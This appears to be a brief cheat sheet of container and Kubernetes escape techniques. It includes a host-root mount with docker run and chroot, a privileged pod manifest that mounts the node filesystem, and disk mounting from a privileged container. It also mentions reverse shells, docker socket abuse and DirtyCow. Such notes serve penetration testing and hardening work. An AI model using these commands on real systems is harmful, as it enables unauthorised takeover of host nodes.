Container Security

Summarize some container security issues simply.

Mount the rootfs of host in container

Misconfigured permissions of docker usergroup or Kubernetes.

docker run -v /:/host --rm -it alpine chroot /host sh

#check if you have permissions or not
shell> kubectl auth can-i --list
Resources   Non-Resource URLs   Resource Names   Verbs
*.*         []                  []               [*]
            [*]                 []               [*]

apiVersion: v1
kind: Pod
metadata:
  name: all-allowed-exec-pod
  labels:
    app: prod
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: all-allowed-pod
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: your-node-name
  volumes:
  - name: noderoot
    hostPath:
      path: /

kubectl apply -f allow_all.yaml
kubectl exec -it all-allowed-exec-pod -- chroot /host bash

You can use reverse shell if you don’t have pods/exec permission

Privileged Container

# Return CapEff=0000003fffffffff if privileged container 
cat /proc/self/status | grep CapEff
# Mount host partitions of rootfs in container
mount /dev/sda1 /mnt
chroot /mnt /bin/sh

UNIX Socket of dockerd

Docker UNIX Socket is the connection between dockerd and client, run as root default.

When mount this socket in container, the process in container can be communicate with dockerd of host directly, thus take over the permissons of dockerd.

Run docker client in container and call the mountpoint of docker unix socket from host

procfs exploit

common procfs tricks

Kernel exploit

DirtyCow or something else